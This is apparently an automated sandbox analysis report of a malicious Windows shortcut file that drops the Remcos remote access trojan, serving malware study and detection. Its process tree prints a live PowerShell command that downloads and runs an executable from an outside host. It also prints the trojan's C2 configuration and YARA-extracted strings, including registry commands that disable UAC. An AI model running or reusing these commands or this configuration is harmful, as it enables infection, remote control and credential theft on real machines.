Edit tour

Windows Analysis Report
MdkbG2pK4l.lnk

Overview

General Information

Sample name:	MdkbG2pK4l.lnk renamed because original name is a hash value
Original sample name:	9ee2b12e8974f00111bb9887f7f9e19f.lnk
Analysis ID:	1518485
MD5:	9ee2b12e8974f00111bb9887f7f9e19f
SHA1:	54d2830260e949b25d291c07ebc6d29d8b4f0af8
SHA256:	f5734ae475931dbb561fc5b636d5a7825d8d99efa8d4d9cdff7e89bf163613dd
Tags:	lnkuser-abuse_ch
Infos:

Detection

Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Windows shortcut file (LNK) starts blacklisted processes

Yara detected Remcos RAT

Yara detected UAC Bypass using CMSTP

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Drops PE files to the user root directory

Found direct / indirect Syscall (likely to bypass EDR)

Found hidden mapped module (file has been removed from disk)

Injects code into the Windows Explorer (explorer.exe)

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Powershell drops PE file

Sigma detected: Suspicious Invoke-WebRequest Execution

Switches to a custom stack to bypass stack traces

Windows shortcut file (LNK) contains suspicious command line arguments

Writes to foreign memory regions

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the user directory

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (may stop execution after checking a module file name)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Startup Folder File Write

Sigma detected: Usage Of Web Request Commands And Cmdlets

Stores files to the Windows start menu directory

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Keylogger Generic

Yara signature match

Classification

Process Tree

System is w10x64

cmd.exe (PID: 4892 cmdline: "C:\Windows\System32\cmd.exe" /c powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/hello.exe && C:\Users\user\AppData\Roaming/hello.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 3652 cmdline: powershell wget http://lawyerconsult.top/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/hello.exe MD5: 04029E121A0CFA5991749937DD22A1D9)

hello.exe (PID: 7528 cmdline: C:\Users\user\AppData\Roaming/hello.exe MD5: 25860926414BF43383246F7C773A8D6C)

DZIPR.exe (PID: 7580 cmdline: "C:\Users\user\DZIPR.exe" MD5: EC9CE1D67F98072281015C7726FBA245)

DZIPR.exe (PID: 7596 cmdline: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe MD5: EC9CE1D67F98072281015C7726FBA245)

cmd.exe (PID: 7620 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

explorer.exe (PID: 8164 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)

svchost.exe (PID: 7884 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

DZIPR.exe (PID: 8048 cmdline: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe MD5: EC9CE1D67F98072281015C7726FBA245)

cmd.exe (PID: 8068 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

explorer.exe (PID: 4044 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)

DZIPR.exe (PID: 2980 cmdline: "C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe" MD5: EC9CE1D67F98072281015C7726FBA245)

cmd.exe (PID: 6732 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

explorer.exe (PID: 2056 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)

DZIPR.exe (PID: 5112 cmdline: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe MD5: EC9CE1D67F98072281015C7726FBA245)

cmd.exe (PID: 6116 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

explorer.exe (PID: 1180 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Version": "5.1.1 Pro", "Host:Port:Password": "fullimmersion777.com:8090:0", "Assigned name": "Back-September", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "hello.exe", "Startup value": "Disable", "Hide file": "Enable", "Mutex": "rimcsl-94LESJ", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\gnqpmvvlbu	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
C:\Users\user\AppData\Local\Temp\gnqpmvvlbu	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
C:\Users\user\AppData\Local\Temp\gnqpmvvlbu	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
C:\Users\user\AppData\Local\Temp\gnqpmvvlbu	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aab8:$a1: Remcos restarted by watchdog! 0x6b030:$a3: %02i:%02i:%02i:%03i
C:\Users\user\AppData\Local\Temp\gnqpmvvlbu	REMCOS_RAT_variants	unknown	unknown	0x64b0c:$str_a1: C:\Windows\System32\cmd.exe 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b7c:$str_b2: Executing file: 0x65bfc:$str_b3: GetDirectListeningPort 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65728:$str_b7: \update.vbs 0x64ba4:$str_b9: Downloaded file: 0x64b90:$str_b10: Downloading file: 0x64c34:$str_b12: Failed to upload file: 0x65bc4:$str_b13: StartForward 0x65be4:$str_b14: StopForward 0x65680:$str_b15: fso.DeleteFile " 0x65614:$str_b16: On Error Resume Next 0x656b0:$str_b17: fso.DeleteFolder " 0x64c24:$str_b18: Uploaded file: 0x64be4:$str_b19: Unable to delete: 0x65648:$str_b20: while fso.FileExists(" 0x650c1:$str_c0: [Firefox StoredLogins not found]
C:\Users\user\AppData\Local\Temp\gnqpmvvlbu	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649f8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6498c:$s1: CoGetObject 0x649a0:$s1: CoGetObject 0x649bc:$s1: CoGetObject 0x6e95e:$s1: CoGetObject 0x6494c:$s2: Elevation:Administrator!new:
C:\Users\user\AppData\Local\Temp\paogviura	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
C:\Users\user\AppData\Local\Temp\paogviura	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
C:\Users\user\AppData\Local\Temp\paogviura	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
C:\Users\user\AppData\Local\Temp\paogviura	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aab8:$a1: Remcos restarted by watchdog! 0x6b030:$a3: %02i:%02i:%02i:%03i
C:\Users\user\AppData\Local\Temp\paogviura	REMCOS_RAT_variants	unknown	unknown	0x64b0c:$str_a1: C:\Windows\System32\cmd.exe 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b7c:$str_b2: Executing file: 0x65bfc:$str_b3: GetDirectListeningPort 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65728:$str_b7: \update.vbs 0x64ba4:$str_b9: Downloaded file: 0x64b90:$str_b10: Downloading file: 0x64c34:$str_b12: Failed to upload file: 0x65bc4:$str_b13: StartForward 0x65be4:$str_b14: StopForward 0x65680:$str_b15: fso.DeleteFile " 0x65614:$str_b16: On Error Resume Next 0x656b0:$str_b17: fso.DeleteFolder " 0x64c24:$str_b18: Uploaded file: 0x64be4:$str_b19: Unable to delete: 0x65648:$str_b20: while fso.FileExists(" 0x650c1:$str_c0: [Firefox StoredLogins not found]
C:\Users\user\AppData\Local\Temp\paogviura	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649f8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6498c:$s1: CoGetObject 0x649a0:$s1: CoGetObject 0x649bc:$s1: CoGetObject 0x6e95e:$s1: CoGetObject 0x6494c:$s2: Elevation:Administrator!new:
C:\Users\user\AppData\Local\Temp\rjhlrgwt	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
C:\Users\user\AppData\Local\Temp\rjhlrgwt	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
C:\Users\user\AppData\Local\Temp\rjhlrgwt	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
C:\Users\user\AppData\Local\Temp\rjhlrgwt	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aab8:$a1: Remcos restarted by watchdog! 0x6b030:$a3: %02i:%02i:%02i:%03i
C:\Users\user\AppData\Local\Temp\rjhlrgwt	REMCOS_RAT_variants	unknown	unknown	0x64b0c:$str_a1: C:\Windows\System32\cmd.exe 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b7c:$str_b2: Executing file: 0x65bfc:$str_b3: GetDirectListeningPort 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65728:$str_b7: \update.vbs 0x64ba4:$str_b9: Downloaded file: 0x64b90:$str_b10: Downloading file: 0x64c34:$str_b12: Failed to upload file: 0x65bc4:$str_b13: StartForward 0x65be4:$str_b14: StopForward 0x65680:$str_b15: fso.DeleteFile " 0x65614:$str_b16: On Error Resume Next 0x656b0:$str_b17: fso.DeleteFolder " 0x64c24:$str_b18: Uploaded file: 0x64be4:$str_b19: Unable to delete: 0x65648:$str_b20: while fso.FileExists(" 0x650c1:$str_c0: [Firefox StoredLogins not found]
C:\Users\user\AppData\Local\Temp\rjhlrgwt	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649f8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6498c:$s1: CoGetObject 0x649a0:$s1: CoGetObject 0x649bc:$s1: CoGetObject 0x6e95e:$s1: CoGetObject 0x6494c:$s2: Elevation:Administrator!new:
C:\Users\user\AppData\Local\Temp\lejp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
C:\Users\user\AppData\Local\Temp\lejp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
C:\Users\user\AppData\Local\Temp\lejp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
C:\Users\user\AppData\Local\Temp\lejp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aab8:$a1: Remcos restarted by watchdog! 0x6b030:$a3: %02i:%02i:%02i:%03i
C:\Users\user\AppData\Local\Temp\lejp	REMCOS_RAT_variants	unknown	unknown	0x64b0c:$str_a1: C:\Windows\System32\cmd.exe 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b7c:$str_b2: Executing file: 0x65bfc:$str_b3: GetDirectListeningPort 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65728:$str_b7: \update.vbs 0x64ba4:$str_b9: Downloaded file: 0x64b90:$str_b10: Downloading file: 0x64c34:$str_b12: Failed to upload file: 0x65bc4:$str_b13: StartForward 0x65be4:$str_b14: StopForward 0x65680:$str_b15: fso.DeleteFile " 0x65614:$str_b16: On Error Resume Next 0x656b0:$str_b17: fso.DeleteFolder " 0x64c24:$str_b18: Uploaded file: 0x64be4:$str_b19: Unable to delete: 0x65648:$str_b20: while fso.FileExists(" 0x650c1:$str_c0: [Firefox StoredLogins not found]
C:\Users\user\AppData\Local\Temp\lejp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649f8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6498c:$s1: CoGetObject 0x649a0:$s1: CoGetObject 0x649bc:$s1: CoGetObject 0x6e95e:$s1: CoGetObject 0x6494c:$s2: Elevation:Administrator!new:
C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
C:\Users\user\DZIPR.exe	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
Click to see the 21 entries

Memory Dumps

Source	Rule	Description	Author	Strings
0000001A.00000002.1827195478.00000000005CB000.00000004.00000001.01000000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x14b8:$a1: Remcos restarted by watchdog! 0x1a30:$a3: %02i:%02i:%02i:%03i
0000001A.00000002.1827230846.00000000005CF000.00000008.00000001.01000000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000016.00000002.1679023505.00000000004F9000.00000002.00000001.01000000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000016.00000002.1679023505.00000000004F9000.00000002.00000001.01000000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000016.00000002.1679023505.00000000004F9000.00000002.00000001.01000000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000016.00000002.1679023505.00000000004F9000.00000002.00000001.01000000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x134b8:$a1: Remcos restarted by watchdog! 0x13a30:$a3: %02i:%02i:%02i:%03i
0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6ab80:$a1: Remcos restarted by watchdog! 0x6b0f8:$a3: %02i:%02i:%02i:%03i
00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6ab80:$a1: Remcos restarted by watchdog! 0x6b0f8:$a3: %02i:%02i:%02i:%03i
0000000B.00000003.1378606402.00000000027A7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000021.00000002.2074816955.0000000000369000.00000002.00000001.01000000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000021.00000002.2074816955.0000000000369000.00000002.00000001.01000000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000021.00000002.2074816955.0000000000369000.00000002.00000001.01000000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000021.00000002.2074816955.0000000000369000.00000002.00000001.01000000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x134b8:$a1: Remcos restarted by watchdog! 0x13a30:$a3: %02i:%02i:%02i:%03i
00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000C.00000000.1381062753.0000000000401000.00000020.00000001.01000000.00000005.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
00000020.00000002.2008670032.0000000000459000.00000002.00000001.01000000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000020.00000002.2008670032.0000000000459000.00000002.00000001.01000000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000020.00000002.2008670032.0000000000459000.00000002.00000001.01000000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000020.00000002.2008670032.0000000000459000.00000002.00000001.01000000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x134b8:$a1: Remcos restarted by watchdog! 0x13a30:$a3: %02i:%02i:%02i:%03i
0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6ab80:$a1: Remcos restarted by watchdog! 0x6b0f8:$a3: %02i:%02i:%02i:%03i
0000001A.00000002.1827055009.00000000005C2000.00000008.00000001.01000000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6ab80:$a1: Remcos restarted by watchdog! 0x6b0f8:$a3: %02i:%02i:%02i:%03i
Process Memory Space: DZIPR.exe PID: 7580	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: cmd.exe PID: 7620	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: cmd.exe PID: 7620	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: cmd.exe PID: 7620	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: cmd.exe PID: 7620	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x10943e:$a1: Remcos restarted by watchdog! 0x109998:$a3: %02i:%02i:%02i:%03i 0x109dc7:$a3: %02i:%02i:%02i:%03i
Process Memory Space: cmd.exe PID: 8068	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: cmd.exe PID: 8068	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: cmd.exe PID: 8068	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: cmd.exe PID: 8068	Windows_Trojan_Remcos_b296e965	unknown	unknown	0xf5b32:$a1: Remcos restarted by watchdog! 0xf608c:$a3: %02i:%02i:%02i:%03i 0xf64bb:$a3: %02i:%02i:%02i:%03i
Process Memory Space: explorer.exe PID: 8164	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: explorer.exe PID: 8164	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: explorer.exe PID: 8164	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: explorer.exe PID: 8164	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6eaa:$a1: Remcos restarted by watchdog! 0x7404:$a3: %02i:%02i:%02i:%03i 0x7833:$a3: %02i:%02i:%02i:%03i
Process Memory Space: cmd.exe PID: 6732	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: cmd.exe PID: 6732	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: cmd.exe PID: 6732	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: cmd.exe PID: 6732	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x525ea:$a1: Remcos restarted by watchdog! 0x52b44:$a3: %02i:%02i:%02i:%03i 0x52f73:$a3: %02i:%02i:%02i:%03i
Process Memory Space: explorer.exe PID: 4044	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: explorer.exe PID: 4044	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: explorer.exe PID: 4044	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: explorer.exe PID: 4044	Windows_Trojan_Remcos_b296e965	unknown	unknown	0xe8e:$a1: Remcos restarted by watchdog! 0x13e8:$a3: %02i:%02i:%02i:%03i 0x181f:$a3: %02i:%02i:%02i:%03i
Process Memory Space: cmd.exe PID: 6116	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: cmd.exe PID: 6116	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: cmd.exe PID: 6116	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: cmd.exe PID: 6116	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x7695f:$a1: Remcos restarted by watchdog! 0x76eb9:$a3: %02i:%02i:%02i:%03i 0x772e8:$a3: %02i:%02i:%02i:%03i
Process Memory Space: explorer.exe PID: 2056	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: explorer.exe PID: 2056	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: explorer.exe PID: 2056	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: explorer.exe PID: 2056	Windows_Trojan_Remcos_b296e965	unknown	unknown	0xf5033:$a1: Remcos restarted by watchdog! 0xf558d:$a3: %02i:%02i:%02i:%03i 0xf59bc:$a3: %02i:%02i:%02i:%03i
